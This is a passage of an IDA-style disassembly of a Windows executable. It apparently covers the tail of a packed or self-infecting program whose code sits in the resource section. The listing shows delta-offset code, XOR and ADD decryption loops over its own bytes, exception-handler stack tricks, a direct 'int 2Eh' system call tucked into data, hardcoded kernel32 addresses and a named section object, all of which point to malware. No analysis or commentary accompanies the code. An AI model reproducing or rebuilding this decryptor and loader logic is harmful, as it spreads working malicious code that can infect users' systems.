byte_444819 db 3 dup(0) ; DATA XREF: .aspack:0042708A�r
; .rsrc:0042CA55�r
dd 5418D20h, 8D891375h
db 0, 43h
word_444826 dw 10h ; DATA XREF: .aspack:0042709E�r
; .rsrc:0042CA69�r
dd 10698503h, 0A7830010h, 69h, 28432B00h, 548789h, 85F70000h
db 7Ch
byte_444841 db 3Fh, 10h, 0 ; DATA XREF: .aspack:00427508�r
dd 1, 43C70774h
db 8
dword_44484D dd 0A0A0A0A0h ; .aspack:00427543�r
dword_444851 dd 39C085F7h db 10h, 2 dup(0)
dd 74004000h
dword_44485C dd 5BE85207h ; ---------------------------------------------------------------------------
idiv edi
call fword ptr [edx-75h]
lea eax, [eax]
inc ebx
loc_444868: ; DATA XREF: .aspack:00427549�r
adc [eax], al
jecxz short loc_444871
mov [ebx+28h], ecx
jmp short loc_44487E
; ---------------------------------------------------------------------------
loc_444871: ; CODE XREF: .rsrc:0044486A�j
; DATA XREF: .aspack:0042755F�r
mov ecx, [ebp+1042FCh]
jecxz short loc_44487B
jmp short loc_44487E
; ---------------------------------------------------------------------------
loc_44487B: ; CODE XREF: .rsrc:00444877�j
mov ecx, [ebx+28h]
loc_44487E: ; CODE XREF: .rsrc:0044486F�j
; .rsrc:00444879�j
test dword ptr [ebp+1039C0h], 3
jz short loc_44489E
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_44489E: ; CODE XREF: .rsrc:00444888�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_4448AF
mov [edx+8], ecx
loc_4448AF: ; CODE XREF: .rsrc:004448AA�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_4448E0
add ecx, [ebp+101069h]
loc_4448E0: ; CODE XREF: .rsrc:004448D8�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_444902
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_444902
mov dh, [ebp+1039BFh]
loc_444902: ; CODE XREF: .rsrc:004448EC�j
; .rsrc:004448FA�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_444919
loc_44490E: ; CODE XREF: .rsrc:00444915�j
mov al, [edi]
add al, dl
stosb
loc_444913: ; DATA XREF: .aspack:00427092�r
; .aspack:004270A6�r ...
add dl, dh
loop loc_44490E
loc_444917: ; DATA XREF: .aspack:0042707C�r
; .rsrc:0042CA47�r
jmp short loc_444922
; ---------------------------------------------------------------------------
loc_444919: ; CODE XREF: .rsrc:0044490C�j
; .rsrc:00444920�j
mov al, [edi]
loc_44491B: ; DATA XREF: .aspack:00427523�r
xor al, dl
stosb
add dl, dh
loop loc_444919
loc_444922: ; CODE XREF: .rsrc:00444523�j
; .rsrc:loc_444917�j
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
cmp dword ptr [ebp+104298h], 0
jz near ptr dword_44426C+18Bh
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
; ---------------------------------------------------------------------------
db 0E8h
align 8
dd 81016A5Dh, 1038CBEDh, 0FF05800h, 158885C1h, 0C0850010h
dd 0FFC883C3h, 85C10FF0h, 101588h, 103DC3h, 1C75002Ah
dd 247C8166h, 75716C0Ch, 0C4E86013h, 75FFFFFFh, 0FAB5E805h
dd 0D2E8FFFFh, 61FFFFFFh, 782DFF2Eh, 0B8123456h, 25h, 0FFA5E860h
dd 3975FFFFh, 3024448Bh, 4184B58Dh, 508B0010h, 3A816608h
dd 25730206h, 6856h, 0C48B00FFh, 5052006Ah, 3F2E95FFh
dd 0C4830010h, 5C3E8108h, 755C3F3Fh, 4C68303h, 0FFFA62E8h
dd 0FF7FE8FFh, 0C361FFFFh, 74B8h, 0B8B1EB00h, 2Fh, 1DE8h
dd 20C200h, 30B8h, 10E800h, 24C20000h, 185B800h, 3E80000h
dd 0C2000000h, 548D002Ch, 2ECD0C24h, 7C00F883h, 0E86019h
dd 8B000000h, 5D302454h, 0ED811A8Bh, 1039A2h, 0FFE0B3E8h
dd 4C261FFh, 2060300h, 31010507h, 0B447AA46h, 9815FFD6h
dd 8B010011h, 0FFh, 118h dup(0)
dd 42005C00h, 73006100h, 4E006500h, 6D006100h, 64006500h
dd 62004F00h, 65006A00h, 74006300h, 5C007300h, 74005600h
dd 65005300h, 74006300h, 47000000h, 0AD7C809Bh, 317C8308h
dd 0A07C9103h, 7C80ADh, 0
dd 0B6000000h, 247C80BDh, 5C7C801Ah, 677C8094h, 2C7C8023h
dd 377C8104h, 0F7C8106h, 587C864Bh, 0EC7C80C0h, 0DE7C80E7h
dd 3C7C80ABh, 777C8115h, 457C810Ah, 0A17C831Ch, 0FF7C80B6h
dd 0CA7C8608h, 0DA7C835Dh, 0DE7C8111h, 0A57C812Ah, 777C821Bh
dd 57C801Dh, 767C80B9h, 0E17C80BBh, 0E57C8309h, 587C863Dh
dd 827C863Fh, 0B87C8127h, 427C831Ch, 1C7C8024h, 747C810Bh
dd 517C80B9h, 877C809Ah, 607C810Dh, 827C90D4h, 547C90D6h
dd 697C90D7h, 937C90D7h, 7C90D7h, 55000000h, 0FD7C90DCh
dd 907C90DCh, 0BA7C90DDh, 0B67C90DDh, 457C90DEh, 327C90E0h
dd 0C67C90EAh, 7C9130h, 15h dup(0)
dd 320030h, 44505Ch, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 740056h
dd 650053h, 740063h, 0D2h dup(0)
dd 4420CD00h, 130Ah dup(0)
_rsrc ends
; Section 7. (virtual address 0004A000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0004A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 44A000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start